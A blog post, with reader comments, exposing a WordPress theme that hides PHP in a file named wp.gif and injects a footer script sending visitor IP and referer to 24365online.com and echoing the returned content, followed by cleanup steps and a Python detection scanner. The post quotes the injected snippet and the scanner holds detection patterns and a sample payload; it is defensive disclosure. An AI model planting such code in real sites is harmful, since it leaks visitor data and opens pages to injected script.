HireWordPressExperts.com has excellent themes…for me to poop on
Posted by Huilaaja, Nov 8
Warning: URL file-access is disabled in the server configuration
After installing one of the HireWordPressExperts.com themes, I got a warning on my front page that file_get_contents() was not allowed to load a remote script from http://24365online.com/_YTG_yu/_dl/get_info.php?… (This PHP warning means allow_url_fopen is switched off on my host; on a server where it is enabled, the remote content would have been fetched and displayed silently, with no warning at all.)
The warning pointed me at wp-includes/general-template.php, where I found this suspicious script:
/*** HWEDLC ***/
…
// $host, $referer and $visitor_ip are built in the elided part above and sent to the remote server
$url = "http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip";
// fetches whatever the remote server returns at request time
$content = file_get_contents($url);
// and prints it, unfiltered, into the footer of every page
echo $content;
After removing the script and refreshing the browser, the warning was gone, but a second refresh brought back the same warning.
I was sure the warning was caused by one of the new theme files, so I searched them for similar content. Unfortunately Windows does not index PHP files, but luckily Visual Studio's find-in-files was able to locate it. Surprisingly, the string was found in an image file, wp.gif. Soon I discovered that functions.php included wp.gif as PHP source (include and require execute any file regardless of its extension), and the code in wp.gif re-added the script to the get_footer function on every page load, which is why it came back after I removed it.
In the end the solution was quite simple:
- Remove wp.gif file
- Remove include or require command from functions.php
- Clean the get_footer function from wp-includes/general-template.php file
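The search described above and the three clean-up steps can be automated. The following scanner is an added example, not code from the original post or from the theme vendor: it walks a theme directory and flags the three tricks the post describes (PHP code hidden in a file that is not a PHP file, an include/require of such a file, and a request-time fetch from an http:// URL), plus the common obfuscation functions. The sample theme it scans is constructed inline; the host name example.invalid in it is a placeholder, not the real one from the post.

```python
"""Scan a WordPress theme directory for a PHP payload hidden in an
image file, an include/require of that file, and remote fetches via
file_get_contents(). Added example; not the post's or the vendor's code.
"""
import os
import re
import tempfile

# Extensions PHP would normally be expected to execute.
CODE_EXTENSIONS = {".php", ".phtml", ".inc"}

# A PHP open tag has no business inside an image or stylesheet.
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

# include/require of something that is not a code file, e.g. require('wp.gif');
INCLUDE_NON_PHP = re.compile(
    rb"\b(include|require)(_once)?\s*\(?\s*"
    rb"(?:dirname\(__FILE__\)\s*\.\s*|__DIR__\s*\.\s*)?"
    rb"['\"]([^'\"]+?)['\"]",
    re.IGNORECASE,
)

# Remote content pulled into the page at request time.
REMOTE_FETCH = re.compile(
    rb"\b(file_get_contents|fopen|curl_init)\s*\(\s*['\"]?https?://",
    re.IGNORECASE,
)

# Obfuscation commonly used to hide the same kind of payload.
OBFUSCATION = re.compile(
    rb"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE
)


def scan_file(path):
    """Return a list of (rule, detail) findings for one file."""
    findings = []
    with open(path, "rb") as fh:
        data = fh.read()
    ext = os.path.splitext(path)[1].lower()
    if ext not in CODE_EXTENSIONS and PHP_OPEN_TAG.search(data):
        findings.append(("php_in_non_code_file", ext))
    for m in INCLUDE_NON_PHP.finditer(data):
        target = m.group(3).decode("latin-1")
        if os.path.splitext(target)[1].lower() not in CODE_EXTENSIONS:
            findings.append(("include_of_non_php", target))
    for m in REMOTE_FETCH.finditer(data):
        findings.append(("remote_fetch", m.group(1).decode()))
    m = OBFUSCATION.search(data)
    if m:
        findings.append(("obfuscation", m.group(1).decode()))
    return findings


def scan_theme(root):
    """Walk a theme directory; return {relative_path: findings} for flagged files."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            found = scan_file(full)
            if found:
                report[os.path.relpath(full, root)] = found
    return report


def build_sample_theme():
    """Write a constructed theme mimicking the post's description; return its path."""
    root = tempfile.mkdtemp(prefix="theme-")
    files = {
        # functions.php pulls the "image" in as code
        "functions.php": b"<?php\nrequire(dirname(__FILE__) . '/wp.gif');\n",
        # wp.gif is PHP, not an image (example.invalid is a placeholder host)
        "wp.gif": (
            b"<?php /*** HWEDLC ***/\n"
            b"$content = file_get_contents(\"http://example.invalid/get_info.php\");\n"
            b"echo $content;\n"
        ),
        # a real (tiny) GIF must not be flagged
        "logo.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
        "style.css": b"/* Theme Name: Sample */\n",
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    theme = build_sample_theme()
    for path, findings in sorted(scan_theme(theme).items()):
        for rule, detail in findings:
            print(f"{path}: {rule} ({detail})")
```

Run it against the real theme directory instead of the constructed one (scan_theme("/path/to/wp-content/themes/suspect")) before activating a downloaded theme; anything it reports in a .gif, .png or .css file is reason enough to discard the theme, and a hit on wp-includes/general-template.php means the payload has already been written into core.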
I still believe the script is just advertising, but whatever the 24365online.com server returns is echoed straight into your page, so HireWordPressExperts.com could, for example, inject a cross-site scripting payload into your site or mess up its layout at any time.
Would you hire "experts" who use this kind of marketing strategy?
- Tags: blog, bug, theme, wordpress | Filed under: Software development
5 comments
Comment by Assassini on 5.1.2010 at 11:50
Thank you for this, I managed to clean my theme.
Comment by marcus kamps on 12.1.2010 at 13:54
I also noticed this script in a theme I downloaded. It included wp.gif in header.php, and had some base64 info in the footer that also resolved to spam links. The wp.gif script also inserted some records into the database, including – you guessed it – a link back to them in wp_links. They must be pretty hungry for PageRank.
I noticed this not because it threw an error, but because it dropped some suspicious characters (“:::::”) in my footer. I like how they even give themselves credit by including their initials in the comment (“HWEDLC” = Hire Wordpress Experts Download Content). Classy.
Thanks for posting.
Pingback by 饭盒 » Blog Archive » About the http://24365online.com problem appearing in some WP themes on 27.3.2010 at 04:24
[...] http://blog.huilaaja.net/2009/11/08/hirewordpressexperts-com/ March 27th, 2010 [...]
Comment by Claudia on 30.5.2010 at 18:20
I did get the same error, but the function call did not involve anything related to a .gif file; anyway, it's annoying!
Thanks for the useful tips.
Pingback by Praxiswissen WordPress » WordPress – Beware of themes of unknown origin! on 1.6.2010 at 21:28
[...] what was devious was that the dubious code was not hidden inside a PHP file at all, but in an image file named wp.gif. You first have to think of that [...]